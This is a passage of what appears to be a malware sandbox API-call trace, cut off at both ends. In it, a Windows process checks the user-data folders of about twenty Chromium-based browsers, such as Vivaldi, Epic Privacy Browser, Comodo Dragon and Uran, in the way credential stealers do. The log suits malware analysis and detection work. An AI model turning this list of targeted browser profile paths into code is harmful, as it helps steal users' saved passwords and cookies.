nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x32 [0221.893] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.895] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.895] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x42 [0221.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.895] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x41 [0221.895] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.897] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.897] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data") returned 0x33 [0221.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.897] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x32 [0221.898] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.899] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.899] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x37 [0221.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.900] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x36 [0221.900] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.901] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.901] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data") returned 0x37 [0221.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.902] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x36 [0221.902] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.903] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.904] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data") returned 0x32 [0221.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.904] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x31 [0221.904] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.906] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.906] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data") returned 0x33 [0221.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.906] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x32 [0221.907] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.908] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.908] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data") returned 0x32 [0221.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.909] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x31 [0221.909] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.911] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.911] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data") returned 0x3c [0221.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.911] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3b [0221.911] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.913] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.913] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x40 [0221.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.913] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3f [0221.914] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.915] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.915] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3a [0221.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.916] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x39 [0221.916] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0221.918] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0221.918] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x55 [0221.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0221.918] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x54 [0221.918] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0221.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.000] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.000] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x40 [0222.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.000] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3f [0222.000] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.003] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.003] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x39 [0222.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.003] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x38 [0222.003] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.005] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.005] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data") returned 0x32 [0222.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.005] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x31 [0222.006] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.008] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.008] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data") returned 0x34 [0222.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.008] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x33 [0222.009] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.010] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.011] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data") returned 0x33 [0222.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.011] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x32 [0222.011] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.013] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.013] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x39 [0222.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.013] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x38 [0222.014] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.016] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.016] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data") returned 0x36 [0222.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.016] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x35 [0222.016] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 